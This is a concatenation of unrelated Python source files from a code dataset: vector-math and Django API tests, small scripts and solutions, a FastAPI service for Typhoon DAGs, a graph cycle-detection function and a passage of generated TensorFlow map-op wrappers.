def test_abs3():
    v = Vec2(-2,3)
    assert v.abs() == abs(v)
    assert v.abs() == (2,3)
def test_abs4():
    v = Vec2(2,3)
    assert v.abs() == abs(v)
    assert v.abs() == (2,3)
def test_norm1():
    v = Vec2(10,0)
    assert v.norm() == (1,0)
def test_norm2():
    v = Vec2(10,0)
    assert v.norm() == (1,0)
def test_norm3():
    v = Vec2(0,10)
    assert v.norm() == (0,1)
# Property-style check: any random non-zero vector normalises to unit length.
def test_norm4():
    import numpy as np
    for i in range(1000):
        v = Vec2(np.random.uniform(-9999, 9999),np.random.uniform(-9999, 9999))
        assert v.norm().len() == approx(1)
def test_round1():
    v = Vec2(1.2345678, -4.56789)
    assert v.round() == (1,-5)
    assert v.round(1) == (1.2,-4.6)
    assert v.round(5) == (1.23457,-4.56789)
    assert v.round(10) == v
def test_ceil1():
    v = Vec2(1.2345678, -4.56789)
    assert v.ceil() == (2,-4)
    assert v.ceil(1) == (1.3,-4.5)
    assert v.ceil(5) == (1.23457,-4.56789)
    assert v.ceil(10) == v
def test_floor1():
    v = Vec2(1.2345678, -4.56789)
    assert v.floor() == (1,-5)
    assert v.floor(1) == (1.2,-4.6)
    assert v.floor(5) == (1.23456,-4.56789)
    assert v.floor(10) == v
def test_trunc1():
    v = Vec2(1.2345678, -4.56789)
    assert v.trunc() == (1,-4)
    assert v.trunc(1) == (1.2,-4.5)
    assert v.trunc(5) == (1.23456,-4.56789)
    assert v.trunc(10) == v
# & is the 2D cross product (a scalar).
def test_cross1():
    v = Vec2(10,20)
    assert v & (1,2) == approx(0)
    assert v & (-1,-2) == approx(0)
    assert (-1,-2) & v == approx(0)
    assert [-1,-2] & v == approx(0)
def test_cross2():
    v1 = Vec2(10,20).norm()
    v2 = Vec2(-200,100).norm()
    assert v1 & v2 == approx(1)
    assert v2 & v1 == approx(-1)
def test_angle_to1():
    v1 = Vec2(10,20)
    v2 = Vec2(-200,100)
    assert v1.angle_to(v2, 1) == approx(90)
    assert v2.angle_to(v1, 1) == approx(-90)
def test_rotate1():
    v = Vec2(10,0)
    assert v.rotate(90, 1) == (0, 10)
    assert v.rotate(-90, 1) == (0, -10)
    assert v.rotate(180, 1) == (-10, 0)
    assert v.rotate(-180, 1) == (-10, 0)
def test_rotate2():
    v = Vec2(10,0)
    assert v.rotate(360, 1) == (10, 0)
    assert v.rotate(-360, 1) == (10, 0)
    assert v.rotate(270, 1) == (0, -10)
    assert v.rotate(-270, 1) == (0, 10)
| StarcoderdataPython |
4877353 | <gh_stars>10-100
from .pynnotator import Pynnotator
| StarcoderdataPython |
8032729 | # -*- coding: utf-8 -*-
from helper_functions.main_script_NDL import Generate_all_dictionary, Generate_corrupt_and_denoising_results, compute_all_recons_scores
from helper_functions.final_plots_display import diplay_ROC_plots, all_dictionaries_display, top_dictionaries_display, all_dictionaries_display_rank, recons_display, recons_display_simple, few_dictionaries_display
# This script generates all figures in
# <NAME>, <NAME>, <NAME>, and <NAME>
# Learning low-rank latent mesoscale structures in networks (2020)
# output files will be saved in Network_dictionary/test
# First add network files for UCLA, Caltech, MIT, Harvard to Data/Networks_all_NDL
# Ref: <NAME>, <NAME>, <NAME>, and <NAME>.
# Comparing community structure tocharacteristics in online collegiate social networks.SIAM Review, 53:526–543, 2011.
# Run main script to generate dictionary files and individual plots
# diplay_ROC_plots(path="Network_dictionary/NDL_denoising_1")
# recons_display()
# few_dictionaries_display(["Caltech36.txt", "MIT8.txt", "Harvard1.txt", "UCLA26.txt"])
# Generate_all_dictionary()
# Generate Figures 2 and 7
# top_dictionaries_display(motif_sizes=[6, 11, 21, 51, 101], latent_motif_rank=2)
# top_dictionaries_display(motif_sizes=[6, 11, 21, 51, 101], latent_motif_rank=1)
# Run main script to perform reconstruction and compute accuracy scores
# compute_all_recons_scores()
# Generate Figure 3
"""
recons_display()
# Generate Figures 8, 11
list_network_files = ['Caltech36.txt',
'MIT8.txt',
'UCLA26.txt',
'Harvard1.txt']
all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='1')
all_dictionaries_display_rank(list_network_files, name='1')
# Generate Figures 9, 12
list_network_files = ['COVID_PPI.txt',
'facebook_combined.txt',
'arxiv.txt',
'node2vec_homosapiens_PPI.txt']
all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='1')
all_dictionaries_display_rank(list_network_files, name='2')
"""
# Generate Figures 10, 13
# The original script assigned list_network_files four times in a row, so only
# the last list was ever used.  Keep the active selection and record the
# alternative network sets as comments for easy switching:
#   ER:  true_edgelist_for_ER_5000_mean_degree_{50,100}.txt
#   SW:  true_edgelist_for_SW_5000_k_50_p_{0.05,0.1}.txt
#   BA:  true_edgelist_for_BA_5000_m_{25,50}.txt
#   Facebook100: Caltech36.txt / MIT8.txt / UCLA26.txt / Harvard1.txt
list_network_files = ['COVID_PPI.txt',
                      'facebook_combined.txt',
                      'arxiv.txt',
                      'node2vec_homosapiens_PPI.txt']
# all_dictionaries_display(list_network_files, motif_sizes = [6, 11, 21, 51, 101] , name='4')
all_dictionaries_display_rank(list_network_files, name='1')
# Run main script to generate ROC files for denoising experiments
Generate_corrupt_and_denoising_results()
# Properly modify the ROC file paths in helper_functions.final_plots_display.display_ROC_plots
# using the file names generated (all starts with "ROC_dict")
# Generate Figure 4 (latex table is separate)
diplay_ROC_plots(path = "Network_dictionary/NDL_denoising_1")
| StarcoderdataPython |
11214422 | <filename>800/19_05_2021/469A.py
def main():
    """Solve Codeforces 469A: together the two players must own all n levels."""
    n = int(input())
    # Each of the two list lines starts with its own count, which we discard.
    levels_x = input().split()[1:]
    levels_y = input().split()[1:]
    if len(set(levels_x + levels_y)) == n:
        print('I become the guy.')
    else:
        print('Oh, my keyboard!')


if __name__ == "__main__":
    main()
# n=int(input())
# x=input().split()[1:]
# y=input().split()[1:]
# print(['Oh, my keyboard!','I become the guy.'][len(set(x+y))==n])
# ------------------------------------------------------------
# print('I become the guy.' if int(input()) <= len(set(input()[1:].split()) | set(input()[1:].split())) else 'Oh, my keyboard!')
# --------------------------------------------------------
#a=input;print("IO hb,e cmoym ek etyhbeo agrudy!."[int(a())>len(set(a().split()[1:]+a().split()[1:]))::2])
| StarcoderdataPython |
9798343 | import json
from django.core.urlresolvers import reverse
from rest_framework import status
from rest_framework.test import APIClient
from openslides import __version__ as version
from openslides.core.config import ConfigVariable, config
from openslides.core.models import CustomSlide, Projector
from openslides.utils.rest_api import ValidationError
from openslides.utils.test import TestCase
class ProjectorAPI(TestCase):
    """
    Tests requests from the anonymous user.

    NOTE(review): '<PASSWORD>' and '<KEY>' are anonymisation placeholders
    left by a data-scrubbing pass, not real credentials/UUIDs - restore the
    original values before running these tests.
    """
    def test_slide_on_default_projector(self):
        # A custom slide assigned to the default projector must be echoed in
        # the projector detail response.
        self.client.login(username='admin', password='<PASSWORD>')
        customslide = CustomSlide.objects.create(title='title_que1olaish5Wei7que6i', text='text_aishah8Eh7eQuie5ooji')
        default_projector = Projector.objects.get(pk=1)
        default_projector.config = {
            '<KEY>': {'name': 'core/customslide', 'id': customslide.id}}
        default_projector.save()
        response = self.client.get(reverse('projector-detail', args=['1']))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(json.loads(response.content.decode()), {
            'id': 1,
            'elements': {
                '<KEY>':
                    {'id': customslide.id,
                     'uuid': '<KEY>',
                     'name': 'core/customslide'}},
            'scale': 0,
            'scroll': 0})
    def test_invalid_slide_on_default_projector(self):
        # An unknown element name must produce an error entry instead of a crash.
        self.client.login(username='admin', password='<PASSWORD>')
        default_projector = Projector.objects.get(pk=1)
        default_projector.config = {
            'fc6ef43b624043068c8e6e7a86c5a1b0': {'name': 'invalid_slide'}}
        default_projector.save()
        response = self.client.get(reverse('projector-detail', args=['1']))
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(json.loads(response.content.decode()), {
            'id': 1,
            'elements': {
                'fc6ef43b624043068c8e6e7a86c5a1b0':
                    {'name': 'invalid_slide',
                     'uuid': 'fc6ef43b624043068c8e6e7a86c5a1b0',
                     'error': 'Projector element does not exist.'}},
            'scale': 0,
            'scroll': 0})
class VersionView(TestCase):
    """
    Tests the version info view.
    """
    def test_get(self):
        # The version endpoint reports the core version plus plugin metadata.
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.get(reverse('core_version'))
        self.assertEqual(json.loads(response.content.decode()), {
            'openslides_version': version,
            'plugins': [
                {'verbose_name': 'OpenSlides Test Plugin',
                 'description': 'This is a test plugin for OpenSlides.',
                 'version': 'unknown'}]})
class ConfigViewSet(TestCase):
    """
    Tests requests to deal with config variables.
    """
    def setUp(self):
        # Save the old value of the config object and add the test values
        # TODO: Can be changed to setUpClass when Django 1.8 is no longer supported
        self._config_values = config.config_variables.copy()
        config.update_config_variables(set_simple_config_view_integration_config_test())
    def tearDown(self):
        # Reset the config variables
        config.config_variables = self._config_values
    def test_retrieve(self):
        self.client.login(username='admin', password='<PASSWORD>')
        config['test_var_aeW3Quahkah1phahCheo'] = 'test_value_Oovoojieme7eephaed2A'
        response = self.client.get(reverse('config-detail', args=['test_var_aeW3Quahkah1phahCheo']))
        self.assertEqual(
            response.data,
            {'key': 'test_var_aeW3Quahkah1phahCheo',
             'value': 'test_value_Oovoojieme7eephaed2A'})
    def test_update(self):
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_Xeiizi7ooH8Thuk5aida']),
            {'value': 'test_value_Phohx3oopeichaiTheiw'})
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(config['test_var_Xeiizi7ooH8Thuk5aida'], 'test_value_Phohx3oopeichaiTheiw')
    def test_update_wrong_datatype(self):
        # A string that cannot be coerced to the integer field is rejected.
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_ohhii4iavoh5Phoh5ahg']),
            {'value': 'test_value_string'})
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {'detail': "Wrong datatype. Expected <class 'int'>, got <class 'str'>."})
    def test_update_wrong_datatype_that_can_be_converted(self):
        """
        Try to send a string that can be converted to an integer to an integer
        field.
        """
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_ohhii4iavoh5Phoh5ahg']),
            {'value': '12345'})
        self.assertEqual(response.status_code, 200)
    def test_update_good_choice(self):
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_wei0Rei9ahzooSohK1ph']),
            {'value': 'key_2_yahb2ain1aeZ1lea1Pei'})
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(config['test_var_wei0Rei9ahzooSohK1ph'], 'key_2_yahb2ain1aeZ1lea1Pei')
    def test_update_bad_choice(self):
        # Values outside the declared choice set are rejected with HTTP 400.
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_wei0Rei9ahzooSohK1ph']),
            {'value': 'test_value_bad_string'})
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {'detail': 'Invalid input. Choice does not match.'})
    def test_update_validator_ok(self):
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_Hi7Oje8Oith7goopeeng']),
            {'value': 'valid_string'})
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(config['test_var_Hi7Oje8Oith7goopeeng'], 'valid_string')
    def test_update_validator_invalid(self):
        # The custom validator (validator_for_testing) rejects 'invalid_string'.
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_Hi7Oje8Oith7goopeeng']),
            {'value': 'invalid_string'})
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {'detail': 'Invalid input.'})
    def test_update_only_with_key(self):
        # A PUT without a 'value' payload is a client error.
        self.client = APIClient()
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.put(
            reverse('config-detail', args=['test_var_Xeiizi7ooH8Thuk5aida']))
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {'detail': 'Invalid input. Config value is missing.'})
    def test_metadata_with_hidden(self):
        # Hidden config variables must not show up in the OPTIONS metadata.
        self.client.login(username='admin', password='<PASSWORD>')
        response = self.client.options(reverse('config-list'))
        filter_obj = filter(
            lambda item: item['key'] == 'test_var_pud2zah2teeNaiP7IoNa',
            response.data['config_groups'][0]['subgroups'][0]['items'])
        self.assertEqual(len(list(filter_obj)), 0)
def validator_for_testing(value):
    """
    Validator for testing.

    Raises a ValidationError for the magic value 'invalid_string'; every
    other value is accepted silently.
    """
    if value == 'invalid_string':
        raise ValidationError({'detail': 'Invalid input.'})
def set_simple_config_view_integration_config_test():
    """
    Sets a simple config view with some config variables but without
    grouping.

    Yields one ConfigVariable per aspect exercised by ConfigViewSet:
    plain value, string, integer, choice, validated and hidden variables.
    """
    yield ConfigVariable(
        name='test_var_aeW3Quahkah1phahCheo',
        default_value=None,
        label='test_label_aeNahsheu8phahk8taYo')
    yield ConfigVariable(
        name='test_var_Xeiizi7ooH8Thuk5aida',
        default_value='')
    # Integer-typed variable used by the datatype tests.
    yield ConfigVariable(
        name='test_var_ohhii4iavoh5Phoh5ahg',
        default_value=0,
        input_type='integer')
    # Choice variable used by the good/bad choice tests.
    yield ConfigVariable(
        name='test_var_wei0Rei9ahzooSohK1ph',
        default_value='key_1_Queit2juchoocos2Vugh',
        input_type='choice',
        choices=(
            {'value': 'key_1_Queit2juchoocos2Vugh', 'display_name': 'label_1_Queit2juchoocos2Vugh'},
            {'value': 'key_2_yahb2ain1aeZ1lea1Pei', 'display_name': 'label_2_yahb2ain1aeZ1lea1Pei'}))
    # Variable guarded by the custom validator above.
    yield ConfigVariable(
        name='test_var_Hi7Oje8Oith7goopeeng',
        default_value='',
        validators=(validator_for_testing,))
    # Hidden variable: must be absent from the OPTIONS metadata.
    yield ConfigVariable(
        name='test_var_pud2zah2teeNaiP7IoNa',
        default_value=None,
        label='test_label_xaing7eefaePheePhei6',
        hidden=True)
| StarcoderdataPython |
4869749 | <filename>google_problems/problem_69.py
"""This problem was asked by Google.
A regular number in mathematics is defined as one which evenly divides some power of 60.
Equivalently, we can say that a regular number is one whose only prime divisors are 2, 3, and 5.
These numbers have had many applications, from helping ancient Babylonians keep time to
tuning instruments according to the diatonic scale.
Given an integer N, write a program that returns, in order, the first N regular numbers.
""" | StarcoderdataPython |
1904314 | ## factory boy
import factory
# Own
from portfolio.models import Account
class AccountFactory(factory.django.DjangoModelFactory):
    """
    Factory for creating accounts
    """
    class Meta:
        model = Account
    # factory_boy sequences count from 0 by default, so the first created
    # account is named 'Account 0', the next 'Account 1', and so on.
    # (The original comment claimed the sequence starts at 1.)
    name = factory.Sequence(lambda n: 'Account {0}'.format(n))
    # Every factory-built account defaults to euros; override per test.
    base_currency = 'EUR'
| StarcoderdataPython |
1967649 | # coding=utf-8
import requests
from bs4 import BeautifulSoup as bs
class ImomoeClientMainPage(object):
    """Scraper for the imomoe.in front page.

    The page is fetched once in ``__init__``; the ``get_*`` methods then
    parse the individual listings out of the cached soup.

    NOTE(review): parsing relies on positional indices into
    ``find_all("div")``, so any layout change on the site silently breaks
    these lookups -- the indices below were determined empirically.
    """

    def __init__(self):
        self.base_url = "http://www.imomoe.in"
        r = requests.get(self.base_url)
        self.mp_html = r.content
        self.soup = bs(self.mp_html, "lxml")
        self.all_div = self.soup.find_all("div")
        self.focus_div = self.all_div[9]          # featured ("hot") carousel
        self.area_box_div = self.all_div[15]      # area filter box
        self.type_box_div = self.all_div[17]      # genre filter box
        self.lang_box_div = self.all_div[18]      # language filter box
        self.latest_more_url = self.all_div[24].span.a["href"]
        self.latest_info_div = self.all_div[25]   # latest-updates listing
        self.japan_more_url = self.all_div[27].span.a["href"]
        self.japan_info_div = self.all_div[28]    # Japanese anime listing
        self.chinese_more_url = self.all_div[30].span.a["href"]
        self.chinese_info_div = self.all_div[31]  # Chinese anime listing

    def _collect_entries(self, container):
        """Parse one listing ``div`` into a list of entry dicts.

        Shared by the latest/Japanese/Chinese listings, which all use the
        same ``<li>`` markup (title/href in the first ``<p>``, episode info
        in the second).  Each dict has ``title``, ``href`` (absolute),
        ``img`` and ``info`` keys.
        """
        entries = []
        for item in container.select("li"):
            entries.append({
                "title": item.select("p")[0].a["title"],
                "href": self.base_url + item.a["href"],
                "img": item.img["src"],
                "info": item.select("p")[1].string,
            })
        return entries

    def get_focus_list(self):
        """Return the featured ("hot") show list.

        Entries are dicts with ``title``, ``href``, ``img`` and ``info``
        keys.  Note: ``href`` here is site-relative, unlike the other
        listings, preserving the original behaviour.
        """
        focus_result = []
        for i in self.focus_div.select("li"):
            focus_result.append({
                "title": i.a["title"],
                "href": i.a["href"],
                "img": i.img["src"],
                "info": i.em.string,
            })
        return focus_result

    def get_latest_list(self):
        """Return the most recently updated shows."""
        return self._collect_entries(self.latest_info_div)

    def get_japan_anime_list(self):
        """Return the Japanese anime listing."""
        return self._collect_entries(self.japan_info_div)

    def get_chinese_anime_list(self):
        """Return the Chinese (domestic) anime listing."""
        return self._collect_entries(self.chinese_info_div)

    def get_top_new_list(self):
        """Fetch and return the full "newest updates" ranking page.

        Performs a fresh HTTP request (the ranking lives on a separate
        page).  Each entry has ``title``, ``href`` (absolute), ``info``
        and ``time`` keys.
        """
        r = requests.get("http://www.imomoe.in/top/new.html")
        soup = bs(r.content, "lxml")
        topli_div = soup.find_all(attrs={"class": "topli"})[0]
        topli_result = []
        for i in topli_div.select("li"):
            info = i.select("a")
            topli_result.append({
                "title": info[1]["title"],
                "href": self.base_url + info[1]["href"],
                "info": info[2].string,
                "time": i.em.string,
            })
        return topli_result
| StarcoderdataPython |
9767223 | # Third party code
#
# The following code are copied or modified from:
# https://github.com/google-research/motion_imitation
# Lint as: python3
"""Defines the minitaur robot related constants and URDF specs."""
# Names of the minitaur's four legs; presumably the canonical index order
# used by consumers of this constants module -- confirm against callers.
LEG_ORDER = ["front_left", "back_left", "front_right", "back_right"]
| StarcoderdataPython |
11359697 | import sys
from PyQt5.QtWidgets import *
class MyWindow(QMainWindow):
    """Main window containing a single one-line text box."""

    def __init__(self):
        super().__init__()
        # x, y, width, height of the window on screen.
        self.setGeometry(300, 300, 400, 300)
        edit = QLineEdit(self)
        edit.move(10, 10)
        edit.resize(200, 30)
        self.line_edit1 = edit
# Standard Qt bootstrap: create the application, show the main window and
# hand control to the event loop.  The loop's exit status is passed to
# sys.exit() so the process exit code reflects how Qt terminated
# (previously the return value of app.exec_() was silently discarded).
app = QApplication(sys.argv)
win = MyWindow()
win.show()
sys.exit(app.exec_())
1784731 | """
Problem Statement:
- The concept of loops or cycles is very common in graph theory.
A cycle exists when you traverse the directed graph and come upon a vertex
that has already been visited.
You have to implement the detect_cycle function which tells you
whether or not a graph contains a cycle.
Input:
- A directed graph.
Output:
- True if a cycle exists. False if it doesn’t.
Sample Input:
graph = {
0 -> 1
1 -> 2
2 -> 0
}
Sample Output:
- True
"""
from collections import deque
from Graph import Graph
def detect_cycle(g):
    """Return True if the directed graph *g* contains a cycle.

    Runs an iterative depth-first search from every vertex, colouring
    vertices WHITE (unseen), GRAY (on the current DFS path) or BLACK
    (fully explored).  An edge into a GRAY vertex is a back edge, which
    proves a cycle.  O(V + E) time, O(V) extra space.

    The previous implementation returned True whenever any vertex was
    merely *revisited*, which falsely reports a cycle for acyclic graphs
    with shared descendants (e.g. the diamond 0->1, 0->2, 1->3, 2->3),
    and it only searched from vertex 0, missing cycles in components
    unreachable from it.
    """
    WHITE, GRAY, BLACK = 0, 1, 2
    color = [WHITE] * g.vertices
    for start in range(g.vertices):
        if color[start] != WHITE:
            continue
        # Each stack entry is (vertex, next adjacency-list node to visit).
        stack = [(start, g.array[start].get_head())]
        color[start] = GRAY
        while stack:
            vertex, adjacent = stack[-1]
            if adjacent is None:
                # All neighbours explored: take vertex off the DFS path.
                color[vertex] = BLACK
                stack.pop()
                continue
            # Advance this frame's adjacency cursor before descending.
            stack[-1] = (vertex, adjacent.next_element)
            neighbor = adjacent.data
            if color[neighbor] == GRAY:
                return True  # back edge -> cycle
            if color[neighbor] == WHITE:
                color[neighbor] = GRAY
                stack.append((neighbor, g.array[neighbor].get_head()))
    return False
if __name__ == '__main__':
    # Demo: one graph with a cycle (0 -> 1 -> 3 -> 0), one without.
    g1 = Graph(4)
    for src, dst in ((0, 1), (1, 2), (1, 3), (3, 0)):
        g1.add_edge(src, dst)
    g2 = Graph(3)
    for src, dst in ((0, 1), (1, 2)):
        g2.add_edge(src, dst)
    print(detect_cycle(g1))
    print(detect_cycle(g2))
| StarcoderdataPython |
300212 | import json
from typing import Optional
import uvicorn
import yaml
from fastapi import FastAPI
from pydantic import BaseModel, Field
from typhoon.core.components import Component
from typhoon.core.dags import IDENTIFIER_REGEX, Granularity, DAGDefinitionV2, TaskDefinition, add_yaml_representers
from typhoon.core.glue import load_components, load_component
from typhoon.core.settings import Settings
from typhoon.deployment.packaging import build_all_dags
# Single FastAPI application instance that every route below attaches to.
app = FastAPI()
@app.get("/api/v1/health-check")
def health_check():
    """Liveness probe; always responds with the plain string 'Ok'."""
    return 'Ok'
@app.get("/api/v1/components")
def get_components():
    """List all known components, mapping component name -> origin kind.

    Built-in ('typhoon') components are collected first; custom
    components are added afterwards, so a name clash resolves to
    'components' (custom wins), as before.
    """
    combined = {}
    for component, _ in load_components(kind='typhoon'):
        combined[component.name] = 'typhoon'
    for component, _ in load_components(kind='custom'):
        combined[component.name] = 'components'
    return {'components': combined}
@app.get("/api/v1/component/{component_name}")
def get_component(component_name: str) -> Optional[Component]:
    """Return the component registered under *component_name*."""
    return load_component(component_name)
@app.get("/api/v1/component-args-schema/{component_name}")
def get_component_args_schema(component_name: str) -> Optional[Component]:
    # TODO: not implemented -- always returns None (serialised as JSON null).
    # NOTE(review): the Optional[Component] annotation looks copied from
    # get_component above; an args *schema* is presumably not a Component.
    # Confirm the intended return type before implementing.
    pass
@app.get("/api/v1/variables")
def get_variables():
    """Return every variable stored in the metadata store."""
    store = Settings.metadata_store()
    return {'variables': store.get_variables()}
@app.get("/api/v1/connections")
def get_connections():
    """Return every connection stored in the metadata store.

    Renamed from ``get_variables``: the original duplicated the function
    name of the ``/api/v1/variables`` handler above, shadowing it at
    module level.  The route path and response shape are unchanged, so
    HTTP clients are unaffected.
    """
    return {'connections': Settings.metadata_store().get_connections()}
class BuildArgs(BaseModel):
    """Request body for building a DAG from a base component."""
    name: str = Field(..., regex=IDENTIFIER_REGEX, description='Name of your DAG')
    schedule_interval: str = Field(
        ...,
        # Accepted forms: an @-alias, a 5/6-field cron expression, or an
        # AWS-style rate() expression (singular unit for 1, plural otherwise).
        # Fixed: the singular-hour branch previously read
        # r'rate\(\s1*\d+\s+hour\s*\)' (one whitespace char followed by
        # optional literal '1's), which failed to match 'rate(1 hour)';
        # it now mirrors the 'rate(1 minute)' branch.
        # NOTE(review): the trailing '|' leaves an empty alternative, so the
        # pattern as a whole also matches any string; kept as-is because
        # tightening it would start rejecting previously accepted payloads.
        regex='(' + '@hourly|@daily|@weekly|@monthly|@yearly|' +
              r'((\*|\?|\d+((\/|\-){0,1}(\d+))*)\s*){5,6}' + '|' +
              r'rate\(\s*1\s+minute\s*\)' + '|' +
              r'rate\(\s*\d+\s+minutes\s*\)' + '|' +
              r'rate\(\s*1\s+hour\s*\)' + '|' +
              r'rate\(\s*\d+\s+hours\s*\)' + '|' +
              ')',
        description='Schedule or frequency on which the DAG should run'
    )
    granularity: Optional[Granularity] = Field(default=None, description='Granularity of DAG')
    base_component: str = Field(..., regex=IDENTIFIER_REGEX, description='Name of base component')
    component_arguments: dict = Field(..., description='Arguments for base component')
@app.post("/api/v1/dag-from-component")
def dag_from_component(build_args: BuildArgs):
    """Wrap a base component into a single-task DAG definition."""
    flow_task = TaskDefinition(
        component=build_args.base_component,
        args=build_args.component_arguments,
    )
    return DAGDefinitionV2(
        name=build_args.name,
        schedule_interval=build_args.schedule_interval,
        granularity=build_args.granularity,
        tasks={'flow': flow_task},
    )
@app.put("/api/v1/dag")
def create_dag(dag: DAGDefinitionV2):
    """Persist *dag* as YAML in the DAGs directory; return the file path."""
    target = Settings.dags_directory / f'{dag.name}.yml'
    add_yaml_representers(yaml.SafeDumper)
    serialized = yaml.safe_dump(dag.dict())
    target.write_text(serialized)
    return str(target)
@app.put("/api/v1/dags-build")
def build_dags():
    """Build all DAGs for local deployment (remote=None) and return 'Ok'."""
    build_all_dags(remote=None)
    return 'Ok'
def run_api():
    """Serve `app` on all interfaces, port 8000 (blocking call)."""
    uvicorn.run(app, host="0.0.0.0", port=8000)
if __name__ == '__main__':
    # Allow `python <module>.py` to launch the development server directly.
    run_api()
| StarcoderdataPython |
1741690 | """Python wrappers around TensorFlow ops.
This file is MACHINE GENERATED! Do not edit.
Original C++ source file: map_ops.cc
"""
import collections
from tensorflow.python import pywrap_tfe as pywrap_tfe
from tensorflow.python.eager import context as _context
from tensorflow.python.eager import core as _core
from tensorflow.python.eager import execute as _execute
from tensorflow.python.framework import dtypes as _dtypes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util import dispatch as _dispatch
from tensorflow.python.util.tf_export import tf_export
from typing import TypeVar
# Machine-generated eager/graph wrapper for the EmptyTensorMap op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('empty_tensor_map')
def empty_tensor_map(name=None):
  r"""Creates and returns an empty tensor map.
  handle: an empty tensor map
  Args:
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: try the C fast path, then the Python eager fallback,
    # then the dispatch registry.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "EmptyTensorMap", name)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return empty_tensor_map_eager_fallback(
          name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            empty_tensor_map, (), dict(name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "EmptyTensorMap", name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          empty_tensor_map, (), dict(name=name)
        )
    if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
      return result
    raise
  _result = _outputs[:]
  if _execute.must_record_gradient():
    _attrs = ()
    _inputs_flat = _op.inputs
    _execute.record_gradient(
        "EmptyTensorMap", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Raw-op endpoint exposed as tf.raw_ops.EmptyTensorMap.
EmptyTensorMap = tf_export("raw_ops.EmptyTensorMap")(_ops.to_raw_op(empty_tensor_map))
# Pure-Python eager path used when the C fast path raises _FallbackException.
def empty_tensor_map_eager_fallback(name, ctx):
  _inputs_flat = []
  _attrs = None
  _result = _execute.execute(b"EmptyTensorMap", 1, inputs=_inputs_flat,
                             attrs=_attrs, ctx=ctx, name=name)
  if _execute.must_record_gradient():
    _execute.record_gradient(
        "EmptyTensorMap", _inputs_flat, _attrs, _result)
  _result, = _result
  return _result
# Machine-generated eager/graph wrapper for the TensorMapErase op (see the
# file header); regenerate from the C++ op definition, do not hand-edit.
@_dispatch.add_dispatch_list
@tf_export('tensor_map_erase')
def tensor_map_erase(input_handle, key, value_dtype, name=None):
  r"""Returns a tensor map with item from given key erased.
  input_handle: the original map
  output_handle: the map with value from given key removed
  key: the key of the value to be erased
  Args:
    input_handle: A `Tensor` of type `variant`.
    key: A `Tensor`.
    value_dtype: A `tf.DType`.
    name: A name for the operation (optional).
  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  tld = _ctx._thread_local_data
  if tld.is_eager:
    # Eager mode: C fast path, then Python eager fallback, then dispatch.
    try:
      _result = pywrap_tfe.TFE_Py_FastPathExecute(
        _ctx, "TensorMapErase", name, input_handle, key, "value_dtype",
        value_dtype)
      return _result
    except _core._NotOkStatusException as e:
      _ops.raise_from_not_ok_status(e, name)
    except _core._FallbackException:
      pass
    try:
      return tensor_map_erase_eager_fallback(
          input_handle, key, value_dtype=value_dtype, name=name, ctx=_ctx)
    except _core._SymbolicException:
      pass  # Add nodes to the TensorFlow graph.
    except (TypeError, ValueError):
      result = _dispatch.dispatch(
            tensor_map_erase, (), dict(input_handle=input_handle, key=key,
                                       value_dtype=value_dtype, name=name)
          )
      if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
        return result
      raise
  # Add nodes to the TensorFlow graph.
  value_dtype = _execute.make_type(value_dtype, "value_dtype")
  try:
    _, _, _op, _outputs = _op_def_library._apply_op_helper(
        "TensorMapErase", input_handle=input_handle, key=key,
        value_dtype=value_dtype, name=name)
  except (TypeError, ValueError):
    result = _dispatch.dispatch(
          tensor_map_erase, (), dict(input_handle=input_handle, key=key,
                                     value_dtype=value_dtype, name=name)
        )
